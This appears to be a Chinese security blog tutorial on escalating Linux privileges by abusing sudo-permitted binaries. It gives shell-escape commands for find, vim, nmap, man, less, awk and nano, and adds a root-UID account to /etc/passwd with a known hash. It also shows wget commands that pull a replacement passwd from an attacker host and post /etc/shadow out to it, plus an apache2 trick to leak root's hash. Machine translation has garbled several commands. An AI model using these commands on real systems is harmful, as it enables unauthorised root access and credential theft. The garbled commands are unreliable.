Linux提权姿势一:滥用SUDO提权

  • A+
所属分类:安全文章

在渗透中,我们拿到的webshell和反弹回来的shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo可以提权。在这里,我们可以通过调用一些二进制文件,这些文件可以帮助我们使用sudo命令提升特权。但是在特权升级之前,让我们了解一些sudoer文件语法,sudo命令是什么?;)。

  1. 什么是SUDO?

  2. Sudoer文件语法。

  3. 利用SUDO用户

    • /usr/bin/find

    • /usr/bin/nano

    • /usr/bin/vim

    • /usr/bin/man

    • /usr/bin/awk

    • /usr/bin/less

    • /usr/bin/nmap ( –interactive and –script method)

    • /bin/more

    • /usr/bin/wget

    • /usr/sbin/apache2

什么是SUDO ??

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。

基础

它的特性主要有这样几点:

§ sudo能够限制用户只在某台主机上运行某些命令。

§ sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。

§ sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且输入它的密码时,用户获得了一张存活期为5分钟的票(这个值可以在编译的时候改变)。

§ sudo的配置文件是sudoers文件,它允许系统管理员集中的管理用户的使用权限和使用的主机。它所存放的位置默认是在/etc/sudoers,属性必须为0440。


在sudo于1980年前后被写出之前,一般用户管理系统的方式是利用su切换为超级用户。但是使用su的缺点之一在于必须要先告知超级用户的密码。


sudo使一般用户不需要知道超级用户的密码即可获得权限。首先超级用户将普通用户的名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息,登记在特殊的文件中(通常是/etc/sudoers),即完成对该用户的授权(此时该用户称为“sudoer”);在一般用户需要取得特殊权限时,其可在命令前加上“sudo”,此时sudo将会询问该用户自己的密码(以确认终端机前的是该用户本人),回答后系统即会将该命令的进程以超级用户的权限运行。之后的一段时间内(默认为5分钟,可在/etc/sudoers自定义),使用sudo不需要再次输入密码。

由于不需要超级用户的密码,部分Unix系统甚至利用sudo使一般用户取代超级用户作为管理帐号,例如Ubuntu、Mac OS X等。

参数说明:

  • -V 显示版本编号

  • -h 会显示版本编号及指令的使用方式说明

  • -l 显示出自己(执行 sudo 的使用者)的权限

  • -v 因为 sudo 在第一次执行时或是在 N 分钟内没有执行(N 预设为五)会问密码,这个参数是重新做一次确认,如果超过 N 分钟,也会问密码

  • -k 将会强迫使用者在下一次执行 sudo 时问密码(不论有没有超过 N 分钟)

  • -b 将要执行的指令放在背景执行

  • -p prompt 可以更改问密码的提示语,其中 %u 会代换为使用者的帐号名称, %h 会显示主机名称

  • -u username/#uid 不加此参数,代表要以 root 的身份执行指令,而加了此参数,可以以 username 的身份执行指令(#uid 为该 username 的使用者号码)

  • -s 执行环境变数中的 SHELL 所指定的 shell ,或是 /etc/passwd 里所指定的 shell

  • -H 将环境变数中的 HOME (家目录)指定为要变更身份的使用者家目录(如不加 -u 参数就是系统管理者 root )

  • command 要以系统管理者身份(或以 -u 更改为其他人)执行的指令



Sudoer文件

sudoers文件主要有三部分组成:

  • sudoers的默认配置(default),主要设置sudo的一些缺省值

  • alias(别名),主要有Host_Alias|Runas_Alias|User_Alias|Cmnd_Alias。

  • 安全策略(规则定义)——重点


语法

root ALL=(ALL) ALL

说明1:root用户可以从  ALL  终端作为  ALL  (任意)用户执行,并运行  ALL  (任意)命令。

第一部分是用户,第二部分是用户可以在其中使用sudo命令的终端,第三部分是他可以充当的用户,最后一部分是他在使用时可以运行的命令。sudo

touhid ALL= /sbin/poweroff

说明2:以上命令,使用户可以从任何终端使用touhid的用户密码关闭命令电源。

touhid ALL = (root) NOPASSWD: /usr/bin/find

说明3:上面的命令,使用户可以从任何终端运行,以root用户身份运行命令find 而无需密码


利用SUDO用户。

要利用sudo用户,您需要找到您必须允许的命令。sudo -l

上面的命令显示了允许当前用户使用的命令。

Linux提权姿势一:滥用SUDO提权

此处sudo -l,显示用户已允许以root用户身份执行所有此二进制文件而无需密码。

让我们一一查看所有二进制文件(仅在索引中提到)和将特权提升给root用户。

使用查找命令

sudo find / etc / passwd -exec / bin / sh ;

要么

sudo find / bin -name nano -exec / bin / sh ;

使用Vim命令

sudo vim -c'!sh'

使用Nmap命令

sudo nmap-交互式
nmap>!sh
sh-4.1#

注意:nmap –interactive选项在最新的nmap中不可用。

也可以

echo“ os.execute('/ bin / sh')”> /tmp/shell.nse && sudo nmap --script = / tmp / shell.nse

使用Man命令

sudo man man

之后按按下并按Enter

使用less/more命令

sudo less / etc / hosts
sudo more / etc / hosts

之后按按下并按Enter

使用awk命令

 sudo awk'BEGIN {system(“ / bin / sh”)}'

使用nano命令

nano是使用此编辑器的文本编辑器,在您需要切换用户之后,您可以修改passwd文件并将用户添加为root特权。在/ etc / passwd中添加此行,以将用户添加为root特权。

touhid:$ 6 $ bxwJfzor $ MUhUWO0MUgdkWfPPEydqgZpm.YtPMI / gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/ root:/ bin

sudo nano / etc / passwd

现在切换用户密码是:test

su touhid

使用wget命令

这种非常酷的方式要求Web服务器下载文件。这样我从没在任何地方见过。让我们解释一下。

在At客者一边。

  • 首先将Target的/ etc / passwd文件复制到攻击者计算机。

  • 修改文件,并在上一步中保存的密码文件中添加用户到攻击者计算机。

  • 仅附加此行=>   touhid:$ 6 $ bxwJfzor $ MUhUWO0MUgdkWfPPEydqgZpm.YtPMI / gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0 / 0:b:root / root:

  • 将passwd文件托管到使用任何Web服务器的主机。

在要提权主机方面。

sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd

现在切换用户密码是:test

su touhid

注意:如果您要从服务器上转储文件,例如root的ssh密钥,shadow文件等。

sudo wget --post-file = / etc / shadow 192.168.56.1:8080

攻击者的设置侦听器:nc  lvp 8080

使用apache命令

但是,我们无法获得Shell和Cant编辑系统文件。

但是使用它 我们可以查看系统文件。

sudo apache2 -f / etc / shadow

输出是这样的:

Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration

可悲的是没有shell。但是我们可以现在提取root哈希,然后破解了哈希


渗透测试 红队攻防 免杀 权限维持 等等技术 

及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

进来一起学习吧

Linux提权姿势一:滥用SUDO提权

Linux提权姿势一:滥用SUDO提权

Linux提权姿势一:滥用SUDO提权




发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: